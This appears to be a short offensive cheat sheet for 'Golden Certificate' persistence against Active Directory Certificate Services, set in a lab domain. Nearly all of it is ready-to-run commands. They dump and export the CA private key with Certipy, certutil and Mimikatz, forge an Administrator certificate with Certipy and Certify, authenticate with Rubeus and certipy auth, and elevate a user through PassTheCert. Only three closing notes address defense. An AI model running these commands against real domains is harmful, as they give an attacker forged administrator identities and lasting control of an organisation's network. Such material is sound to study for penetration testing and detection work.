Golden Certificate abuse starts when the CA private key is compromised. With the CA signing key, we can forge certificates offline for arbitrary principals trusted by the domain.
Dump CA backup with Certipy
certipy ca -backup -u 'Administrator@ootw.local' -p 'Password123!' -ca 'OOTW-CA' -target 10.10.10.200
Export CA certificate from Windows
$Serial = "CERT_SERIAL"
certutil -store my
certutil -exportPFX my $Serial ca.pfx
Export with Mimikatz
mimikatz.exe "privilege::debug" "crypto::certificates /systemstore:local_machine /export" "exit"
Forge certificate with Certipy
certipy forge -ca-pfx OOTW-CA.pfx -upn administrator@ootw.local -out administrator_forged.pfx
Forge certificate with Certify
$AdminSid = "ADMINISTRATOR_SID"
Certify.exe forge --ca-cert .\OOTW-CA.pfx --upn Administrator --subject "CN=Administrator,CN=Users,DC=ootw,DC=local" --sid $AdminSid --crl ldap:///CN=OOTW-CA,CN=dc01,CN=CDP,CN=Public Key Services,CN=Services,CN=Configuration,DC=ootw,DC=local
Authenticate
certipy auth -pfx administrator_forged.pfx -domain ootw.local -dc-ip 10.10.10.200
export KRB5CCNAME=administrator.ccache
Use Rubeus
$ForgedCertB64 = "FORGED_CERT_B64"
Rubeus.exe asktgt /user:Administrator /domain:ootw.local /certificate:$ForgedCertB64 /ptt
Extract cert and key for Schannel
certipy cert -pfx administrator_forged.pfx -nokey -out administrator.crt
certipy cert -pfx administrator_forged.pfx -nocert -out administrator.key
PassTheCert example
python3 passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target student -elevate -domain ootw.local -dc-host dc01.ootw.local
Notes
- This is persistence against the PKI trust root.
- Rotating user passwords or
krbtgtdoes not remove the CA private key problem. - Treat CA private key exposure as a forest-level incident.